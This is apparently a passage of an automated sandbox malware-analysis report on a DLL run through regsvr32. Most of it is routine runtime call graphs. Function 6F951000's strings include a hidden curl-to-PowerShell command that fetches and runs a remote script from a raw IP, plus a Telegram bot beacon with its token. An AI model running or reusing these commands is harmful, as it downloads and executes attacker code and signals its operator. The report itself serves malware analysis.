14 API calls 9191->9193 9192->9184 9193->9192 9200 6f953727 9194->9200 9196 6f952381 9196->8911 9197 6f955faf 9196->9197 9198 6f9566b8 __dosmaperr 14 API calls 9197->9198 9199 6f95238d 9198->9199 9199->8914 9199->8915 9201 6f953730 9200->9201 9202 6f953733 GetLastError 9200->9202 9201->9196 9203 6f953dc2 ___vcrt_FlsGetValue 6 API calls 9202->9203 9204 6f953748 9203->9204 9205 6f953767 9204->9205 9206 6f9537ad SetLastError 9204->9206 9207 6f953dfd ___vcrt_FlsSetValue 6 API calls 9204->9207 9205->9206 9206->9196 9208 6f953761 __FrameHandler3::FrameUnwindToState 9207->9208 9208->9205 9209 6f953789 9208->9209 9210 6f953dfd ___vcrt_FlsSetValue 6 API calls 9208->9210 9211 6f953dfd ___vcrt_FlsSetValue 6 API calls 9209->9211 9212 6f95379d 9209->9212 9210->9209 9211->9212 9213 6f9555ad ___std_exception_copy 14 API calls 9212->9213 9213->9205 9215 6f9523e1 ___scrt_release_startup_lock 9214->9215 9216 6f9523e5 9215->9216 9219 6f9523f1 __DllMainCRTStartup@12 9215->9219 9217 6f955e19 __DllMainCRTStartup@12 14 API calls 9216->9217 9218 6f9523ef 9217->9218 9218->8923 9220 6f9523fe 9219->9220 9221 6f95519b __FrameHandler3::FrameUnwindToState 21 API calls 9219->9221 9220->8923 9222 6f95535a 9221->9222 9222->8923 9235 6f9531aa InterlockedFlushSList 9223->9235 9227 6f952589 9226->9227 9228 6f951eea 9227->9228 9239 6f955fc2 9227->9239 9232 6f951f26 9228->9232 9230 6f952597 9231 6f953202 ___scrt_uninitialize_crt 7 API calls 9230->9231 9231->9228 9337 6f9523ff 9232->9337 9236 6f9522a2 9235->9236 9237 6f9531ba 9235->9237 9236->8927 9237->9236 9238 6f9555ad ___std_exception_copy 14 API calls 9237->9238 9238->9237 9240 6f955fcd 9239->9240 9241 6f955fdf ___scrt_uninitialize_crt 9239->9241 9242 6f955fdb 9240->9242 9244 6f959e13 9240->9244 9241->9230 9242->9230 9247 6f959ca4 9244->9247 9250 6f959bf8 9247->9250 9251 6f959c04 __FrameHandler3::FrameUnwindToState 9250->9251 9258 6f956933 EnterCriticalSection 9251->9258 9253 6f959c7a 9267 6f959c98 9253->9267 9254 6f959c0e ___scrt_uninitialize_crt 9254->9253 9259 6f959b6c 9254->9259 9258->9254 9260 6f959b78 __FrameHandler3::FrameUnwindToState 9259->9260 9270 6f959f30 EnterCriticalSection 9260->9270 9262 6f959b82 ___scrt_uninitialize_crt 9263 6f959bbb 9262->9263 9271 6f959dae 9262->9271 9284 6f959bec 9263->9284 9336 6f95697b LeaveCriticalSection 9267->9336 9269 6f959c86 9269->9242 9270->9262 9272 6f959dc3 ___std_exception_copy 9271->9272 9273 6f959dd5 9272->9273 9274 6f959dca 9272->9274 9287 6f959d45 9273->9287 9275 6f959ca4 ___scrt_uninitialize_crt 68 API calls 9274->9275 9283 6f959dd0 9275->9283 9278 6f954c8c ___std_exception_copy 39 API calls 9280 6f959e0d 9278->9280 9280->9263 9281 6f959df6 9300 6f95bd79 9281->9300 9283->9278 9335 6f959f44 LeaveCriticalSection 9284->9335 9286 6f959bda 9286->9254 9288 6f959d5e 9287->9288 9289 6f959d85 9287->9289 9288->9289 9290 6f95a149 ___scrt_uninitialize_crt 39 API calls 9288->9290 9289->9283 9293 6f95a149 9289->9293 9291 6f959d7a 9290->9291 9311 6f95c598 9291->9311 9294 6f95a155 9293->9294 9295 6f95a16a 9293->9295 9296 6f956a7b __dosmaperr 14 API calls 9294->9296 9295->9281 9297 6f95a15a 9296->9297 9298 6f954f50 ___std_exception_copy 39 API calls 9297->9298 9299 6f95a165 9298->9299 9299->9281 9301 6f95bd97 9300->9301 9302 6f95bd8a 9300->9302 9304 6f95bde0 9301->9304 9307 6f95bdbe 9301->9307 9303 6f956a7b __dosmaperr 14 API calls 9302->9303 9306 6f95bd8f 9303->9306 9305 6f956a7b __dosmaperr 14 API calls 9304->9305 9308 6f95bde5 9305->9308 9306->9283 9322 6f95bcd7 9307->9322 9309 6f954f50 ___std_exception_copy 39 API calls 9308->9309 9309->9306 9313 6f95c5a4 __FrameHandler3::FrameUnwindToState 9311->9313 9312 6f95c5e5 9314 6f954ed3 ___std_exception_copy 29 API calls 9312->9314 9313->9312 9315 6f95c62b 9313->9315 9321 6f95c5ac 9313->9321 9314->9321 9316 6f95bb96 ___scrt_uninitialize_crt EnterCriticalSection 9315->9316 9317 6f95c631 9316->9317 9318 6f95c64f 9317->9318 9319 6f95c6a9 ___scrt_uninitialize_crt 62 API calls 9317->9319 9320 6f95c6a1 ___scrt_uninitialize_crt LeaveCriticalSection 9318->9320 9319->9318 9320->9321 9321->9289 9323 6f95bce3 __FrameHandler3::FrameUnwindToState 9322->9323 9324 6f95bb96 ___scrt_uninitialize_crt EnterCriticalSection 9323->9324 9325 6f95bcf2 9324->9325 9326 6f95bc6d ___scrt_uninitialize_crt 39 API calls 9325->9326 9334 6f95bd37 9325->9334 9328 6f95bd1e FlushFileBuffers 9326->9328 9327 6f956a7b __dosmaperr 14 API calls 9329 6f95bd3e 9327->9329 9328->9329 9330 6f95bd2a GetLastError 9328->9330 9332 6f95bd6d ___scrt_uninitialize_crt LeaveCriticalSection 9329->9332 9331 6f956a68 __dosmaperr 14 API calls 9330->9331 9331->9334 9333 6f95bd56 9332->9333 9333->9306 9334->9327 9335->9286 9336->9269 9342 6f955ff2 9337->9342 9340 6f9537ec ___vcrt_uninitialize_ptd 6 API calls 9341 6f951f2b 9340->9341 9341->8917 9345 6f956838 9342->9345 9346 6f956842 9345->9346 9347 6f952406 9345->9347 9349 6f959378 9346->9349 9347->9340 9350 6f9591f8 _unexpected 5 API calls 9349->9350 9351 6f959394 9350->9351 9352 6f95939d 9351->9352 9353 6f9593af TlsFree 9351->9353 9352->9347 9953 6f9568cb 9956 6f956852 9953->9956 9957 6f95685e __FrameHandler3::FrameUnwindToState 9956->9957 9964 6f956933 EnterCriticalSection 9957->9964 9959 6f956868 9960 6f956896 9959->9960 9962 6f95a4ba ___scrt_uninitialize_crt 14 API calls 9959->9962 9965 6f9568b4 9960->9965 9962->9959 9964->9959 9968 6f95697b LeaveCriticalSection 9965->9968 9967 6f9568a2 9968->9967 10178 6f959ee4 10179 6f959e13 ___scrt_uninitialize_crt 68 API calls 10178->10179 10180 6f959eec 10179->10180 10188 6f95c8c5 10180->10188 10182 6f959ef1 10198 6f95c970 10182->10198 10185 6f959f1b 10186 6f956a8e ___free_lconv_mon 14 API calls 10185->10186 10187 6f959f26 10186->10187 10189 6f95c8d1 __FrameHandler3::FrameUnwindToState 10188->10189 10202 6f956933 EnterCriticalSection 10189->10202 10191 6f95c948 10209 6f95c967 10191->10209 10193 6f95c8dc 10193->10191 10195 6f95c91c DeleteCriticalSection 10193->10195 10203 6f95d210 10193->10203 10197 6f956a8e ___free_lconv_mon 14 API calls 10195->10197 10197->10193 10199 6f95c987 10198->10199 10200 6f959f00 DeleteCriticalSection 10198->10200 10199->10200 10201 6f956a8e ___free_lconv_mon 14 API calls 10199->10201 10200->10182 10200->10185 10201->10200 10202->10193 10204 6f95d223 ___std_exception_copy 10203->10204 10212 6f95d0eb 10204->10212 10206 6f95d22f 10207 6f954c8c ___std_exception_copy 39 API calls 10206->10207 10208 6f95d23b 10207->10208 10208->10193 10297 6f95697b LeaveCriticalSection 10209->10297 10211 6f95c954 10211->10182 10213 6f95d0f7 __FrameHandler3::FrameUnwindToState 10212->10213 10214 6f95d124 10213->10214 10215 6f95d101 10213->10215 10222 6f95d11c 10214->10222 10223 6f959f30 EnterCriticalSection 10214->10223 10216 6f954ed3 ___std_exception_copy 29 API calls 10215->10216 10216->10222 10218 6f95d142 10224 6f95d182 10218->10224 10220 6f95d14f 10238 6f95d17a 10220->10238 10222->10206 10223->10218 10225 6f95d1b2 10224->10225 10226 6f95d18f 10224->10226 10228 6f95d1aa 10225->10228 10229 6f959d45 ___scrt_uninitialize_crt 64 API calls 10225->10229 10227 6f954ed3 ___std_exception_copy 29 API calls 10226->10227 10227->10228 10228->10220 10230 6f95d1ca 10229->10230 10231 6f95c970 14 API calls 10230->10231 10232 6f95d1d2 10231->10232 10233 6f95a149 ___scrt_uninitialize_crt 39 API calls 10232->10233 10234 6f95d1de 10233->10234 10241 6f95d9fc 10234->10241 10237 6f956a8e ___free_lconv_mon 14 API calls 10237->10228 10296 6f959f44 LeaveCriticalSection 10238->10296 10240 6f95d180 10240->10222 10243 6f95d1e5 10241->10243 10244 6f95da25 10241->10244 10242 6f95da74 10245 6f954ed3 ___std_exception_copy 29 API calls 10242->10245 10243->10228 10243->10237 10244->10242 10246 6f95da4c 10244->10246 10245->10243 10248 6f95d96b 10246->10248 10249 6f95d977 __FrameHandler3::FrameUnwindToState 10248->10249 10256 6f95bb96 EnterCriticalSection 10249->10256 10251 6f95d985 10253 6f95d9b6 10251->10253 10257 6f95da9f 10251->10257 10270 6f95d9f0 10253->10270 10256->10251 10273 6f95bc6d 10257->10273 10259 6f95dab5 10286 6f95bbdc 10259->10286 10261 6f95daaf 10261->10259 10263 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10261->10263 10269 6f95dae7 10261->10269 10262 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10264 6f95daf3 CloseHandle 10262->10264 10266 6f95dade 10263->10266 10264->10259 10268 6f95daff GetLastError 10264->10268 10265 6f95db0d ___scrt_uninitialize_crt 10265->10253 10267 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10266->10267 10267->10269 10268->10259 10269->10259 10269->10262 10295 6f95bbb9 LeaveCriticalSection 10270->10295 10272 6f95d9d9 10272->10243 10274 6f95bc7a 10273->10274 10276 6f95bc8f 10273->10276 10275 6f956a68 __dosmaperr 14 API calls 10274->10275 10277 6f95bc7f 10275->10277 10278 6f956a68 __dosmaperr 14 API calls 10276->10278 10280 6f95bcb4 10276->10280 10279 6f956a7b __dosmaperr 14 API calls 10277->10279 10281 6f95bcbf 10278->10281 10282 6f95bc87 10279->10282 10280->10261 10283 6f956a7b __dosmaperr 14 API calls 10281->10283 10282->10261 10284 6f95bcc7 10283->10284 10285 6f954f50 ___std_exception_copy 39 API calls 10284->10285 10285->10282 10287 6f95bc52 10286->10287 10288 6f95bbeb 10286->10288 10289 6f956a7b __dosmaperr 14 API calls 10287->10289 10288->10287 10294 6f95bc15 10288->10294 10290 6f95bc57 10289->10290 10291 6f956a68 __dosmaperr 14 API calls 10290->10291 10292 6f95bc42 10291->10292 10292->10265 10293 6f95bc3c SetStdHandle 10293->10292 10294->10292 10294->10293 10295->10272 10296->10240 10297->10211 9354 6f95206a 9355 6f952073 9354->9355 9356 6f952078 9354->9356 9371 6f95223b 9355->9371 9360 6f951f34 9356->9360 9361 6f951f40 __FrameHandler3::FrameUnwindToState 9360->9361 9362 6f951f69 dllmain_raw 9361->9362 9367 6f951f64 __DllMainCRTStartup@12 9361->9367 9368 6f951f4f 9361->9368 9363 6f951f83 dllmain_crt_dispatch 9362->9363 9362->9368 9363->9367 9363->9368 9364 6f951fd5 9365 6f951fde dllmain_crt_dispatch 9364->9365 9364->9368 9366 6f951ff1 dllmain_raw 9365->9366 9365->9368 9366->9368 9367->9364 9369 6f951e84 __DllMainCRTStartup@12 86 API calls 9367->9369 9370 6f951fca dllmain_raw 9369->9370 9370->9364 9372 6f952251 9371->9372 9374 6f95225a 9372->9374 9375 6f9521ee GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9372->9375 9374->9356 9375->9374

                                                                                                Executed Functions

                                                                                                Function 6F956EAB Relevance: 16.7, APIs: 11, Instructions: 188synchronizationCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 6f956eab-6f956eb7 1 6f956ece-6f956ed2 0->1 2 6f956eb9-6f956ecd call 6f956a7b call 6f954f50 0->2 1->2 3 6f956ed4-6f956ed8 1->3 6 6f956ee4-6f956f09 call 6f95ae09 3->6 7 6f956eda-6f956ee2 call 6f956a68 3->7 14 6f956f22-6f956f42 call 6f9571ed 6->14 15 6f956f0b-6f956f20 call 6f956a8e * 2 6->15 7->2 20 6f956f44-6f956f62 call 6f956a8e * 3 14->20 21 6f956f6c-6f956f73 14->21 27 6f956f65-6f956f67 15->27 20->27 24 6f956f75-6f956f77 21->24 25 6f956f78-6f956fc8 call 6f956a68 call 6f9533d0 call 6f95ae14 21->25 24->25 40 6f957014-6f957023 GetLastError call 6f956a21 25->40 41 6f956fca-6f956fd0 25->41 31 6f9570ab-6f9570ae 27->31 53 6f957025-6f957026 CloseHandle 40->53 54 6f95702c-6f95702e 40->54 42 6f956fd6-6f956fd8 41->42 43 6f9570af-6f9570b6 call 6f95535e 41->43 45 6f957039-6f95703c 42->45 46 6f956fda-6f956ff1 WaitForSingleObject GetExitCodeProcess 42->46 49 6f95703e-6f957040 45->49 50 6f95707a-6f95707c 45->50 46->40 51 6f956ff3-6f956ffb 46->51 59 6f957042-6f957043 CloseHandle 49->59 60 6f957049-6f95704b 49->60 55 6f957085-6f9570a5 call 6f956a8e * 3 50->55 56 6f95707e-6f95707f CloseHandle 50->56 61 6f957004-6f957006 51->61 62 6f956ffd-6f956ffe CloseHandle 51->62 53->54 57 6f957056-6f957078 call 6f956a8e * 3 54->57 58 6f957030-6f957037 CloseHandle 54->58 79 6f9570a7-6f9570aa 55->79 56->55 57->79 58->57 59->60 64 6f957054 60->64 65 6f95704d-6f95704e CloseHandle 60->65 67 6f95700f-6f957012 61->67 68 6f957008-6f957009 CloseHandle 61->68 62->61 64->57 65->64 67->57 68->67 79->31
                                                                                                APIs
                                                                                                  • Part of subcall function 6F956A8E: HeapFree.KERNEL32(00000000,00000000,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AA4
                                                                                                  • Part of subcall function 6F956A8E: GetLastError.KERNEL32(?,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AAF
                                                                                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F956FDC
                                                                                                • GetExitCodeProcess.KERNELBASE(?,?), ref: 6F956FE9
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F956FFE
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957009
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957014
                                                                                                • __dosmaperr.LIBCMT ref: 6F95701B
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957026
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957031
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957043
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F95704E
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F95707F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2764183375-0
                                                                                                • Opcode ID: d5ae05d5f146bc4ca3e0d0321ca3818495068bc107bf2a68a8105dab6195e736
                                                                                                • Instruction ID: a321e98985f0f9d9a18d7ef8a04501a5f8a3b317096c4e47111c4bc96319f699
                                                                                                • Opcode Fuzzy Hash: d5ae05d5f146bc4ca3e0d0321ca3818495068bc107bf2a68a8105dab6195e736
                                                                                                • Instruction Fuzzy Hash: 49515B7190020CEBEF12DFA4C984AEE7BB9EF46315F108166E910A61D1D731DA78DF62
                                                                                                Function 6F951E84 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __RTC_Initialize.LIBCMT ref: 6F951ECB
                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6F951EE5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                • String ID:
                                                                                                • API String ID: 2442719207-0
                                                                                                • Opcode ID: 2bbbc4437b33f0beafa3613e169e1d1912b658109abf41a96f938a2b6b962db6
                                                                                                • Instruction ID: e2276723bfa995d3542d43ed16c1eda4113e27017016161c2d1841421cb4f0a4
                                                                                                • Opcode Fuzzy Hash: 2bbbc4437b33f0beafa3613e169e1d1912b658109abf41a96f938a2b6b962db6
                                                                                                • Instruction Fuzzy Hash: 4D41D672D05715AFDB21CF69CC40BAE3AB9EF967A4F10411AE8146B2D1D730DDA1CBA0
                                                                                                Function 6F956CB6 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 208COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 130 6f956cb6-6f956cc3 131 6f956cc5-6f956cd8 call 6f956a7b call 6f954f50 130->131 132 6f956cdd-6f956ce0 130->132 141 6f956e6a-6f956e6c 131->141 132->131 133 6f956ce2-6f956ce7 132->133 133->131 135 6f956ce9-6f956ced 133->135 135->131 137 6f956cef-6f956cf2 135->137 137->131 139 6f956cf4-6f956d0f call 6f95f610 * 2 137->139 146 6f956d11-6f956d13 139->146 147 6f956d82-6f956d84 139->147 148 6f956d15-6f956d23 call 6f95f610 146->148 149 6f956d8c-6f956da0 call 6f95f610 146->149 150 6f956d86-6f956d88 147->150 151 6f956d8a 147->151 148->149 158 6f956d25-6f956d27 148->158 156 6f956da2-6f956dae call 6f9577f8 149->156 157 6f956dcd-6f956dcf 149->157 150->149 150->151 151->149 166 6f956db4-6f956dbe call 6f956eab 156->166 167 6f956e5e 156->167 160 6f956dd2-6f956dd7 157->160 161 6f956d2a-6f956d2f 158->161 160->160 163 6f956dd9-6f956def call 6f9578b8 160->163 161->161 164 6f956d31-6f956d44 call 6f9578b8 161->164 177 6f956df1-6f956dfb call 6f956a8e 163->177 178 6f956e00-6f956e10 call 6f956040 163->178 173 6f956d46-6f956d47 164->173 174 6f956d4c-6f956d5d call 6f956040 164->174 176 6f956dc3-6f956dc8 166->176 170 6f956e5f-6f956e65 call 6f956a8e 167->170 185 6f956e68-6f956e69 170->185 173->170 190 6f956e9c-6f956eaa call 6f954f7d 174->190 191 6f956d63-6f956d70 call 6f95a98c 174->191 182 6f956e91-6f956e9a call 6f956a8e 176->182 177->182 189 6f956e16-6f956e2a call 6f956a7b 178->189 178->190 182->185 185->141 199 6f956e2d-6f956e3d call 6f956040 189->199 191->190 200 6f956d76-6f956d80 call 6f956a8e 191->200 199->190 205 6f956e3f-6f956e4a call 6f9577f8 199->205 200->149 208 6f956e6d-6f956e8e call 6f956a7b call 6f956eab call 6f956a8e 205->208 209 6f956e4c-6f956e55 205->209 208->182 209->199 211 6f956e57-6f956e5d call 6f956a8e 209->211 211->167
                                                                                                APIs
                                                                                                • _strrchr.LIBCMT ref: 6F956CF9
                                                                                                • _strrchr.LIBCMT ref: 6F956D03
                                                                                                • _strrchr.LIBCMT ref: 6F956D18
                                                                                                  • Part of subcall function 6F956A8E: HeapFree.KERNEL32(00000000,00000000,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AA4
                                                                                                  • Part of subcall function 6F956A8E: GetLastError.KERNEL32(?,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AAF
                                                                                                  • Part of subcall function 6F954F7D: IsProcessorFeaturePresent.KERNEL32(00000017,6F954F4F,?,00000000,00000000,00000000,00000000,?,00000000,?,6F954EC6,?,00000000,00000000,00000000,00000000), ref: 6F954F7F
                                                                                                  • Part of subcall function 6F954F7D: GetCurrentProcess.KERNEL32(C0000417,00000000,?,00000000,?,?,6F954F6F,00000000,00000000,00000000,00000000,00000000,?,6F951118), ref: 6F954FA2
                                                                                                  • Part of subcall function 6F954F7D: TerminateProcess.KERNEL32(00000000,?,?,6F954F6F,00000000,00000000,00000000,00000000,00000000,?,6F951118), ref: 6F954FA9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
                                                                                                • String ID: .com
                                                                                                • API String ID: 3694955208-4200470757
                                                                                                • Opcode ID: 9b357d92cf556d5484546850c74081d810e9dd2059ce5f94eb7f2d74c119b2f5
                                                                                                • Instruction ID: 4c2b800bafc330f446592be22e472aa8b40ae3d784f9c81bcc1d74f6572a7735
                                                                                                • Opcode Fuzzy Hash: 9b357d92cf556d5484546850c74081d810e9dd2059ce5f94eb7f2d74c119b2f5
                                                                                                • Instruction Fuzzy Hash: 07514872504305AAEB16DE74DC44BAF377CDF53768F140929E910AB2C3EB22E938C261
                                                                                                Function 6F951F34 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 219 6f951f34-6f951f45 call 6f952730 222 6f951f47-6f951f4d 219->222 223 6f951f56-6f951f5d 219->223 222->223 226 6f951f4f-6f951f51 222->226 224 6f951f5f-6f951f62 223->224 225 6f951f69-6f951f7d dllmain_raw 223->225 224->225 227 6f951f64-6f951f67 224->227 228 6f952026-6f95202d 225->228 229 6f951f83-6f951f94 dllmain_crt_dispatch 225->229 230 6f95202f-6f95203e 226->230 231 6f951f9a-6f951fac call 6f952286 227->231 228->230 229->228 229->231 234 6f951fd5-6f951fd7 231->234 235 6f951fae-6f951fb0 231->235 237 6f951fde-6f951fef dllmain_crt_dispatch 234->237 238 6f951fd9-6f951fdc 234->238 235->234 236 6f951fb2-6f951fd0 call 6f952286 call 6f951e84 dllmain_raw 235->236 236->234 237->228 239 6f951ff1-6f952023 dllmain_raw 237->239 238->228 238->237 239->228
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                • String ID:
                                                                                                • API String ID: 3136044242-0
                                                                                                • Opcode ID: f39c099539444fd164665c3a7531fb4ba72e803a38b6eaf60135d062b150ed0f
                                                                                                • Instruction ID: 12a90bac32d630ebe43dbcbb5dfe6bd070e1fa0829f1c007a7fd4f5244ca9082
                                                                                                • Opcode Fuzzy Hash: f39c099539444fd164665c3a7531fb4ba72e803a38b6eaf60135d062b150ed0f
                                                                                                • Instruction Fuzzy Hash: 04217171D01715ABDB22CF65C840AAF3A7DEB967A4F014116FC146A2D1D730DDA5CBA0
                                                                                                Function 6F951000 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                • powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", xrefs: 6F95101D
                                                                                                • cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, xrefs: 6F951010
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: task
                                                                                                • String ID: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -$powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                                • API String ID: 1384045349-2968791885
                                                                                                • Opcode ID: 1ae58ab471330fdb1f05da6f03169599845c29f2ff9a5343fe61446ffa99f7c5
                                                                                                • Instruction ID: b0a6ff7db1b291017c8c5855dc18d32104c4796cba38b27d8e520abd0a3aa384
                                                                                                • Opcode Fuzzy Hash: 1ae58ab471330fdb1f05da6f03169599845c29f2ff9a5343fe61446ffa99f7c5
                                                                                                • Instruction Fuzzy Hash: 56F03070D1030CA7DF44EFA4E9929BE73389F31258F900068B806661E2FF71EA69C691
                                                                                                Function 6F955232 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,6F95522C,00000000,6F954D53,?,?,2C12E102,6F954D53,?), ref: 6F955243
                                                                                                • TerminateProcess.KERNEL32(00000000,?,6F95522C,00000000,6F954D53,?,?,2C12E102,6F954D53,?), ref: 6F95524A
                                                                                                • ExitProcess.KERNEL32 ref: 6F95525C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
